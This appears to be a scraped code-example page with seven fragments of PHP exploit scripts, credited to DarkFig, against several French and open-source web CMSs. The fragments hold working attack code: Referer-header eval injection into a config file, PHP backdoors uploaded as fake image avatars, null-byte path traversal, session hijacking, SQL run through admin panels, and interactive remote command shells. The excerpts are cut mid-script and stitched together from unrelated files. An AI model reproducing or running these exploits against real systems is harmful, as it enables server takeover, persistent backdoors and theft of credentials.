예제 #1
0
# |
# 142. function ConfigSave(...
# 212. $file = fopen("config.php","w");
# 401. $content .= "\$perpage = $xperpage;\n";
# 402. $content .= "\$popular = $xpopular;\n";...
# 614. fwrite($file, $content);
# 615. fclose($file);
#
$PHPCODE = 'if(isset($_SERVER[HTTP_REFERER])) eval($_SERVER[HTTP_REFERER])';
# Default config value
# You can get the config here ./admin.php?op=Configure
#
$config = array(frmdt_url => $url . 'admin.php', "xparse" => "1", "xgzhandler" => "0", "xfilemanager" => "0", "xadmin_cook_duration" => "240", "xuser_cook_duration" => "8000", "xsitename" => "NPDS SABLE", "xTitlesitename" => "NPDS - générateur de portail Php / Mysql en Open Source", "xnuke_url" => "http://www.npds.org", "xsite_logo" => "themes/Permanent-Double-Side/images/npds_p.gif", "xslogan" => "NPDS SABLE", "xstartdate" => "01/10/2005", "xtop" => "10;{$PHPCODE}", "xstoryhome" => "10", "xoldnum" => "10", "xultramode" => "1", "xanonymous" => "Anonyme", "xanonpost" => "0", "xtroll_limit" => "6", "xmod_admin_news" => "0", "xnot_admin_count" => "1", "xDefault_Theme" => "Permanent-Double-Side", "xstart_page" => "index.php?op=edito", "xlanguage" => "french", "xmulti_langue" => "false", "xlocale" => "french", "xlever" => "08:00", "xcoucher" => "20:00", "xgmt" => "", "xbanners" => "0", "xmyIP" => "1.1.1.100", "xfoot4" => "", "xbackend_title" => "NPDS", "xbackend_language" => "fr-FR", "xfoot1" => "Tous les Logos et Marques sont déposés, les commentaires sont sous la responsabilité de ceux qui les ont publiés, le reste @ npds.org", "xfoot2" => "Ce site a été construit avec <a href=http://www.npds.org CLASS=NOIR>NPDS</a>, un système de portail écrit en PHP. Ce logiciel est sous <a href=http://www.gnu.org CLASS=NOIR>GNU/GPL license</a>.", "xfoot3" => "syndication de vos News via <a href=http://www.votre_site/backend.php CLASS=NOIR>www.votre_site/backend.php</a> -::- + encore via le NPDS Push Infos System", "xbackend_image" => "", "xbackend_width" => "88", "xbackend_height" => "31", "xperpage" => "10", "xpopular" => "10", "xnewlinks" => "10", "xtoplinks" => "10", "xlinksresults" => "10", "xlinks_anonaddlinklock" => "0", "xlinkmainlogo" => "0", "xOnCatNewLink" => "1", "xadminmail" => "", "xmail_fonction" => "1", "xEmailFooter" => "", "xnotify" => "0", "xnotify_email" => "*****@*****.**", "xnotify_subject" => "Nouvelle soumission", "xnotify_message" => "Le site a recu une nouvelle soumission !", "xnotify_from" => "webmaster", "xmoderate" => "1", "xcommentlimit" => "4096", "xmaxOptions" => "12", "xBarScale" => "1", "xsetCookies" => "1", "xpollcomm" => "1", "xtipath" => "themes/Permanent-Double-Side/images/topics/", "xuserimg" => "/themes/Permanent-Double-Side/images/menu/", "xadminimg" => "images/admin/", "xadmingraphic" => "0", "xadmf_ext" => "gif", "xshort_menu_admin" => "1", "xsite_font" => "Verdana, Arial, Helvetica", "xadmart" => "10", "xminpass" => "5", "xshow_user" => "20", "xsmilies" => "1", "xavatar_size" => "60*80", "xshort_user" => "0", "xAutoRegUser" => "1", "xmemberpass" => "1", "xsubscribe" => "1", "xmember_invisible" => "0", "xCloseRegUser" => "0", "xhttpref" => "1", "xhttprefmax" => "1000", "xmember_list" => "0", "xdownload_cat" => "Tous", "xshort_review" => "0", "xrss_host_verif" => "false", "xcache_verif" => "true", "xdns_verif" => "false", "xsavemysql_size" => "256", "xsavemysql_mode" => "1", "xtiny_mce" => "true", "op" => "ConfigSave");
# 0_o my website has been reset
#
$xpl->formdata($config);
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    $xpl->addheader("Referer", "@system({$cmd});die;");
    $xpl->get($url . 'config.php');
    print $xpl->getcontent() . "\n\$shell> ";
}
function getparam($param, $opt = '')
{
    global $argv;
    foreach ($argv as $value => $key) {
        if ($key == '-' . $param) {
            return $argv[$value + 1];
        }
    }
    if ($opt) {
        exit("\n-{$param} parameter required");
예제 #2
0
    $xpl->addcookie("sql_pseudo", $login);
    $xpl->addcookie("sql_pass", md5($pass));
    $xpl->addcookie("auto", "off");
    print "[*] PHPSESSID : {$phpsessid['1']}\n";
} else {
    exit("[*] Can't log in\n");
}
//Id
if (!isset($id)) {
    preg_match("#id=([0-9]+)\" title=\"Voir son profil\">" . $login . "<\\/a>#i", $s, $id_member);
    $id = $id_member[1];
}
print "[*] Id : {$id}\n";
//Upload
$formdata = array(frmdt_url => $url . '/index.php?mod=espace_membre&ac=profil', 'action' => 'modifier', 'ok' => '1', 'id' => $id, 'pseudo' => $login, 'sql_newNom' => $login, 'sql_newMail' => $email, 'MAX_FILE_SIZE' => '2097152', 'valider' => ' Modifier mon profil', 'userfile[]' => array(frmdt_type => 'image/jpeg', frmdt_filename => 'test.jpg', frmdt_content => $source));
$xpl->formdata($formdata);
print "[*] Upload finish.\n";
$url = $url . "/eskuel/help.php?action=../../../images/avatars/upload/" . $id . ".jpg%00";
print "[*] Exploit Sucess !\n";
print "[*] The code can be run here : \nhttp://" . $url . "\n";
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
예제 #3
0
<?php

/*
Title:          Jupiter CMS 1.1.5 File Upload Vulnerability
Advisory ID:    12070214
Risk level:     High
Author:         DarkFig <*****@*****.**>
URL:            http://www.acid-root.new.fr/advisories/12070214.txt
*/
error_reporting(E_ALL ^ E_NOTICE);
$url = ' http://localhost/jupiter/';
$xpl = new phpsploit();
$xpl->agent("Mozilla");
$arr = array(frmdt_url => $url . 'modules/emoticons.php', "a" => 1, "req_file" => array(frmdt_filename => "iamaphpfile.php", frmdt_type => "image/jpeg", frmdt_content => "<?php echo(iamontheserver); ?>"));
$xpl->formdata($arr);
$xpl->get($url . 'images/emoticons/iamaphpfile.php');
print $xpl->getcontent();
/*
 * 
 * Copyright (C) darkfig
 * 
 * This program is free software; you can redistribute it and/or 
 * modify it under the terms of the GNU General Public License 
 * as published by the Free Software Foundation; either version 2 
 * of the License, or (at your option) any later version. 
 * 
 * This program is distributed in the hope that it will be useful, 
 * but WITHOUT ANY WARRANTY; without even the implied warranty of 
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
 * GNU General Public License for more details. 
 *
예제 #4
0
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url . 'index.php?site=files&action=save', "fileurl" => 1, "upfile" => array(frmdt_filename => basename($file), frmdt_content => file_get_contents($file)));
$xpl->formdata($frmdt);
if (preg_match("#{$match_upload}#si", $xpl->getcontent())) {
    print "\nDone";
} else {
    print "\nFailed";
}
print " ({$url}downloads/" . basename($file) . ")\n";
# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
예제 #5
0
# Language configuration
$xpl->get($url . "admin/languages.php?adminsid={$sid}&action=edit&lang={$lang}&editwith=0&file={$filetoed}");
preg_match_all('#name="(.*)">(.*)</textarea>#', $xpl->getcontent(), $name_value);
# We can't use:
# - <? OR <?php
# - <script language="php">
# - ' OR "
#
$PHPCODE = '${${error_reporting(0)}}' . '${${$handle=fopen(' . chrit('./' . $backdoor) . ',' . chrit('w') . ')}}' . '${${fwrite($handle,' . chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>') . ')}}' . '${${fclose($handle)}}';
$name_value[2][0] .= $PHPCODE;
$postdata = array(frmdt_url => $url . 'admin/languages.php', "adminsid" => $sid, "action" => "do_edit", "lang" => $lang, "editwith" => 0, "inadmin" => 0, "file" => $filetoed, "Update Language Variables" => "  Update Language Variables");
for ($i = 0; $i < count($name_value[1]); $i++) {
    $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]);
}
# print $xpl->showlastrequest();
$xpl->formdata($postdata);
# Trying to execute the php code
$xpl->get($url . 'index.php');
# If not the default language
$xpl->get($url . 'inc/languages/' . $lang . '/' . $filetoed);
print "\nThe php file should be created\n\$shell> ";
# Hello master
while (!preg_match("#^(quit|exit)\$#", $cmd = trim(fgets(STDIN)))) {
    # ');include('../../inc/config.php');print $config['password'];//
    $xpl->addheader('Shell', "system('{$cmd}');");
    $xpl->get($url . $backdoor);
    print $xpl->getcontent() . "\n\$shell> ";
}
function sql_inject($field)
{
    global $xpl, $url, $prefix, $debug, $result, $bef, $aft, $truetime, $benchmark, $a, $b, $sub, $f;
예제 #6
0
$xpl = new phpsploit();
if ($prx) {
    $xpl->proxy($prx);
}
$xpl->addcookie("grade[a]", "a");
/* Code in the fake avatar */
if ($mode == 0) {
    $file_upload_code = '<?php if(isset($_POST[\'d\'])) unlink(__FILE__); ?><?php if(isset($_POST[\'upload\'])) { if( !move_uploaded_file($_FILES[\'file\'][\'tmp_name\'], "./".$_FILES[\'file\'][\'name\'])) echo("<center>Error ".$_FILES[\'file\'][\'error\']."</center>");else echo "<center>File uploaded</center>"; } ?><form method="post" enctype="multipart/form-data"><center><input type="file" name="file"><input type="submit" name="upload" value="Upload"><input type="submit" name="d" value="x"></center></form><br><form method="get"></form>';
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . "if(isset(\$_SERVER['HTTP_UPLOAD'])) { \$f=fopen('w00t.php','w');fputs(\$f,'" . preg_replace("#'#i", "\\'", $file_upload_code) . "');print 'upfiledone'; }\n" . 'include("include/files/accueil.php"); ?>';
} else {
    $c0de = '<?php' . "\n" . 'error_reporting(0);' . 'if(isset($_SERVER[HTTP_SHELL]))' . '{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}' . 'include("include/files/accueil.php"); ?>';
}
/* Upload avatar with PHP c0de */
print " * uploading avatar\t";
$avatar = array(frmdt_url => $url . '?page=avatars&op=modify', 'avatar' => array(frmdt_filename => '1.gif', frmdt_type => 'image/gif', frmdt_content => $c0de), 'id' => 1, 'mode' => 'J', 'avatarurl' => '', 'avatarremoteurl' => '', 'MAX_FILE_SIZE' => 999999);
if (preg_match("#location.href='\\?page=avatars&id=\\d+&mode=J'#i", $xpl->formdata($avatar))) {
    print "done\n";
} else {
    die("error\n");
}
if (preg_match('#<span style="float: right;" ><img src="([^"]+)#i', $xpl->get($url . '?page=joueurs&id=1'), $match)) {
    $img = $match[1];
} else {
    die(" * can't find image name\n");
}
/* Change homepage to our avatar, with a null byte, after saving website name. */
print " * changing homepage\t";
preg_match('#name=nomsite value="([^ ]+)"#i', $xpl->get($url . '?page=configuration&op=admin'), $all);
$postdata = "nomsite={$all['1']}&urlsite={$url}&logo=logo.gif&pagestart=../.{$img}%00&inscription_joueur=1&inscription_equipe=1&places=200&emailcontact=&emailinscription=&langue=english&theme=phptournois&gzip=1&poulewin=3&poulenull=2&pouleloose=1&poulefor=0&information=&reglement=&decharge=&shoutbox=1&shoutlimit=20&shoutboxc=255&news=1&ladder=1&messagerie=1&support=0&faq=1&serveur=1&download=1&liens=1&galerie=1&livredor=1&sponsors=0&partenaires=1&forum=1&contact=1&horloge=1&commande=1&avatar=A&avatar_upload=1&avatar_remote=1&avatar_gallerie=0&avatar_filesize_max=100000&avatar_x_max=80&avatar_y_max=80&irc=1&ircserver=euroserv.fr.quakenet.org&ircport=6667&ircpassword=&ircchannels=%23phptournois+%23lan+%23lan.cs+%23lan.q3&mail=N&smtpserver=&smtpuser=&smtppassword="******"done\n";
예제 #7
0
}
$what = array("login", "passwd", "user_id", "session");
for ($i = 0; $i < count($what); $i++) {
    print "\n" . $what[$i] . " -> " . $matches[2][$i];
}
if (empty($matches[2][3])) {
    exit("\nNo session found");
}
# Logged in as admin
$name = array("admin_session", "user_id", "sess_id");
$xpl->addcookie($config[1] . '_' . $name[0], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[1], $matches[2][2]);
$xpl->addcookie($config[1] . '_' . $name[2], $matches[2][3]);
$phpc = array(frmdt_url => $url . '?file=User&op=update_pref', 'fichiernom' => array(frmdt_filename => '1.jpg', frmdt_content => $config[4]));
$xpl->addheader('Referer', $url);
$xpl->formdata($phpc);
$xpl->get($url . '?file=User&op=edit_pref');
if (!preg_match('#\\<input name=\\"photo\\" value=\\"(\\S+)\\"#', $xpl->getcontent(), $match)) {
    exit("\nNo file found");
} else {
    print "\n\$shell> ";
}
$sql = array();
$sql[] = "ALTER TABLE {$config['0']}_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";
/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
$sql[] = "UPDATE {$config['0']}_block SET type=" . char('/../../../' . $match[1] . "") . " WHERE bid=1;";
$sql[] = "DELETE FROM {$config['0']}_nbconnecte;";
for ($i = 0; $i < count($sql); $i++) {
    $xpl->post($url . '?file=Admin&page=mysql&op=upgrade_db', 'upgrade=' . $sql[$i]);
}